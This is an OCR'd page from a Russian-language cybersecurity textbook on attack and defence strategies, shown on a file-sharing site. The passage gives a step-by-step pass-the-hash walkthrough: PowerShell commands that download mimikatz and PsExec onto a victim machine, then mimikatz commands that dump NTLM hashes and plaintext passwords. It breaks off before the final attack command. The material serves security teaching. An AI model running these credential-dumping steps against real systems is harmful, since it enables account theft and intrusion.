Интернетмагазин

Download 18,66 Mb.

Pdf ko'rish

bet	120/272
Sana	25.02.2022
Hajmi	18,66 Mb.
	#290514

1 ... 116 117 118 119 120 121 122 123 ... 272

Bog'liq
Диогенес Ю., Озкайя Э. - Кибербезопасность. Стратегии атак и обороны - 2020

Рис. 6.18

136  Охота на пользовательские реквизиты
Обратите внимание, что выполняется файл .exe. Если щелкнете гиперссылку
для этой строки, то увидите, что этот исполняемый файл – cmd.exe, как показа-
но на рис. 6.19.
Рис. 6.19
Последний фрагмент декодирования этого отчета показывает действие
Launch для исполняемого файла cmd.exe.
Атака Pass-the-hash
На этом этапе у вас есть доступ к cmd.exe, и оттуда вы можете запустить Power-
Shell с помощью команды start powershell –NoExit. Причина, по которой вы хо-

Взлом реквизитов доступа пользователя 

137
тите запустить PowerShell, заключается в том, что вам нужно скачать mimikatz
с GitHub.
Для этого выполните следующую команду:
Invoke-WebRequest -Uri
"https://github.com/gentilkiwi/mimikatz/releases/download/2.1.1-20170813/mi
mikatz_trunk.zip" -OutFile "C:tempmimikatz_trunk.zip"
Также обязательно загрузите утилиту PsExec с сайта Sysinternals, поскольку
она понадобится вам позже.
Для этого используйте команду из той же консоли PowerShell:
Invoke-WebRequest -Uri
"https://download.sysinternals.com/files/PSTools.zip" -OutFile
"C:tempPSTools.zip"
В консоли PowerShell используйте команду expand-archive -path, чтобы из-
влечь содержимое из mimikatz_trunk.zip. Теперь можно запустить mimikatz. Од-
ним из первых шагов является проверка наличия у пользователя, запускающе-
го командную строку, привилегий администратора. Если они у него есть, при
выполнении команды privilege::debug вы увидите результаты, показанные на
рис. 6.20.
Рис. 6.20
Следующий шаг – сброс всех активных пользователей, служб и связанных
с ними хешей NTLM/SHA1. Это очень важный шаг, потому что он даст вам
представление о количестве пользователей, которых вы можете попытаться
скомпрометировать, чтобы продолжить свою миссию.
Для этого используйте команду sekurlsa::logonpasswords (рис. 6.21).
Если на компьютере жертвы установлена какая-либо версия Windows (вплоть
до Windows 7), можно увидеть фактический пароль в виде открытого текста.
Причина, по которой мы говорим «может», заключается в том, что если на этом

138  Охота на пользовательские реквизиты
компьютере установлено обновление MS16-014, Windows принудительно уда-
лит утекшие учетные данные сессии авторизации через 30 с.
Рис. 6.21
Продвигаясь вперед, вы можете выполнить атаку, т. к. теперь у вас есть хеш.
Атаку можно осуществить в системе Windows, используя mimikatz и утилиту
psexec
(ту, что вы скачали ранее). В этом сценарии мы будем использовать сле-
дующую команду в качестве примера:

Download 18,66 Mb.

Do'stlaringiz bilan baham:

1 ... 116 117 118 119 120 121 122 123 ... 272